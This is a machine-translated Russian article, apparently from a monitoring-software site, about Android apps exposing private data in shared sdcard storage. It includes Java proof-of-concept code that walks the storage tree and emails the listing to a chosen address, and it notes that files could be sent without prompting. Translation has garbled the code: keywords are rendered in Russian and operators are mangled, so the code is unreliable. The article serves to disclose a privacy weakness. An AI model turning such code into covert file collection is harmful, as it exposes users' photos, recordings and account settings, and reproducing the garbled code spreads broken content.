This is a machine translation. The original page (in English) is available here.

Последние мировые новости: года-Почему США рассматривают возможность запрета TikTok RSS-канал

Главная> > Статьи> > Разработчики приложений для Android не заботятся о безопасности данных пользователей, что приводит к утечке данных
Лучшие кейлоггеры
Посмотреть еще...

Разработчики Android-приложений не заботятся о безопасности данных пользователей, что приводит к утечке данных

  •  
Рейтинг пользователя: нет отзывов. Будьте первым, кто рассмотрит его! 0-1 голос
Ни для кого не секрет, что Android-приложения печально известны своей уязвимостью к утечке данных, главным образом из-за их разработчиков. Еще один факт, который подтверждает это, был недавно описан в habrahabr.ru -российский ресурс, популярный у IT-специалистов, особенно у разработчиков приложений.

На своем собственном смартфоне автор поста заметил каталоги и файлы из приложений, которые уже давно были удалены, в /storage / sdcard и задался вопросом, Может ли одно приложение Android читать временные файлы из другого приложения.

Какие временные файлы и почему мы должны заботиться о них? Эти файлы могут содержать ваши фотографии, телефонные записи, базу данных ваших дневников и множество другой информации, которую вы лично считаете частной и не хотите делать ее доступной для всех.

В Android временные файлы всех приложений хранятся в файле / storage / sdcard. Когда приложение удаляется, эти временные рамки остаются - если разработчик не заботился об их удалении в этом случае.

Файловый менеджер, загруженный из google.play позволит вам читать временные файлы из всех приложений, установленных на Android-устройстве, включая незашифрованные записи телефонных разговоров из мессенджеров и приложений sip-телефонии, историю просмотров из браузеров, плейлисты из плееров, различную информацию из социальных сетей, личные заметки о том, что нужно делать из дневников и т. д.

Просто представьте себе: временные файлы из whatsapp, популярного мессенджера с более чем 33 000 000 пользователей, также хранятся в /storage/sdcard; более того, шифруются только сообщения, фотографии-нет. Whatsapp-это всего лишь один пример из многих; почти все популярные приложения хранят ваши личные данные в /storage/sdcard/%appName%, и любое другое приложение имеет доступ к этому каталогу.

Например, этот мессенджер хранит отправленные вам фотографии в каталоге, доступном всем приложениям на вашем устройстве, имеющим разрешение на доступ к хранилищу:

Например, этот мессенджер хранит фотографии, отправленные вам без какого-либо шифрования; изображения хранятся в каталоге, который доступен всем приложениям на вашем устройстве, имеющим разрешение на доступ к storage.In в худшем случае эти данные могут быть украдены для получения несанкционированного доступа

И этот популярный sip-клиент хранит там настройки вашего sip-аккаунта. В худшем случае эти данные могут быть украдены для получения несанкционированного доступа:

в худшем случае эти данные могут быть украдены для получения несанкционированного доступа

Ну, значит ли это, что кто-то может украсть фотографии с Вашего Android-устройства? Автор написал довольно небольшую программу на Java, которая отправляла структуру /storage / sdcard на указанный адрес электронной почты.

Исходный код приложения, которое отправляет по электронной почте структуру каталога / хранилища / sdcard:

-----------------

пакет android. com. testapp;

импорт android.Содержание.Намерение;
импорт android.ос.Окружающая среда;
импорт android.Поддержка.v7.апп.AppCompatActivity;
импорт android.ос.Пачка;
импорт android.Вид.Вид;
импорт android.виджет.Кнопка;
импорт android.виджет.EditText;
импорт android.виджет.Тост;

импорт java. io. файла;
импортируйте java.утиль.Дата;

public class MainActivity расширяет AppCompatActivity {
Кнопка электронной почты;
EditText email;

@ Переопределение
protected void onCreate (Bundle savedInstanceState) {
супер.onCreate(savedInstanceState);
setContentView (R. layout.activity_main);

email = (EditText) findViewById(R. id. email);
emailButton = (Button) findViewById (R. id. emailButton);
кнопка электронной почты.setOnClickListener(новый вид.OnClickListener () {
@ Переопределение
public void onClick (View v) {
getFileStrucure ();
}
});
}

protected void getFileStrucure () {
Filewalker fw = new Filewalker();
фу.walk (new File (Environment.getExternalStorageDirectory ().getAbsolutePath()));
}

частный класс Filewalker {
private int count = 0;
частная строка sked = "";
public void walk (корень файла) {
граф++;
File[] list = root.listFiles ();
for (File f : list) {
if (f. isDirectory ()) {
sked + = "time:" + new Date(f. lastModified ())+", dir: "+ f. getAbsoluteFile () + "\n";
прогулка (f);
}
еще {
sked + = "time:" + new Date(f. lastModified ())+", size: "+ f.length ()+", " + f.getAbsoluteFile () + "\n";
}
}
граф...;
if (count = = 0) {
sendMail(sked);
}
}
}

защищенный void sendMail (String sked) {
Намерение i = новое намерение (Intent.ACTION_SEND);
i. setType ("message / rfc822");
i. putExtra (намерение.EXTRA_EMAIL, новая строка [] {email.getText ().toString ()});
i. putExtra (намерение.EXTRA_SUBJECT, "структура хранения android");
i. putExtra (намерение.EXTRA_TEXT, sked);
попробуй {
startActivity (намерение.createChooser (i, " отправить почту..."));
} catch (android.Содержание.ActivityNotFoundException ex) {
Тост.makeText (getApplicationContext (), "там не установлены почтовые клиенты.", Тост.LENGTH_SHORT).показать ();
}
}

}

-----------------

Вы вводите адрес электронной почты, и приложение отправляет по электронной почте структуру каталога / хранилища / sdcard; как вы знаете, это можно сделать без запроса электронной почты и не только структуру каталога, но и сами файлы могут быть отправлены. Приложения в google.игру вряд ли будут проверять очень тщательно. К сожалению, это очень эффективный инструмент для маркетологов, так как они всегда хотят знать как можно больше о своих пользователях. Излишне говорить, что таким образом можно получить персональные данные.

А вот письмо, которое вы получите; оно содержит содержимое /storage / sdcard, то есть там будут все файлы и папки из приложений, установленных на вашем устройстве:

Здесь нет каталогов и файлов приложений от google.play, который вы установили на свое мобильное устройство и используете каждый день - это каталог sdcard эмулятора android.

Просмотр каталога / хранилища / sdcard с помощью любого файлового менеджера для android; как вариант, то же самое доступно при подключении устройства к ПК как /телефон; если вы используете мессенджеры, социальные сети, планировщик задач, посмотрите, что теоретически может увидеть любой разработчик android, написавший android.разрешение.READ_EXTERNAL_STORAGE в манифесте.

Таким образом, вывод очевиден: многие из тех, кто разрабатывает такие приложения, как социальные сети, мессенджеры, клиенты sip-телефонии, дневники, не заботятся о сохранности данных пользователей.
Дата публикации:
Читайте статью полностью
Главная> > Статьи> > Разработчики приложений для Android не заботятся о безопасности данных пользователей, что приводит к утечке данных
Важно! Установка средств компьютерного мониторинга на компьютеры, которыми вы не владеете или не имеете разрешения на мониторинг, может нарушать местное, государственное или федеральное законодательство.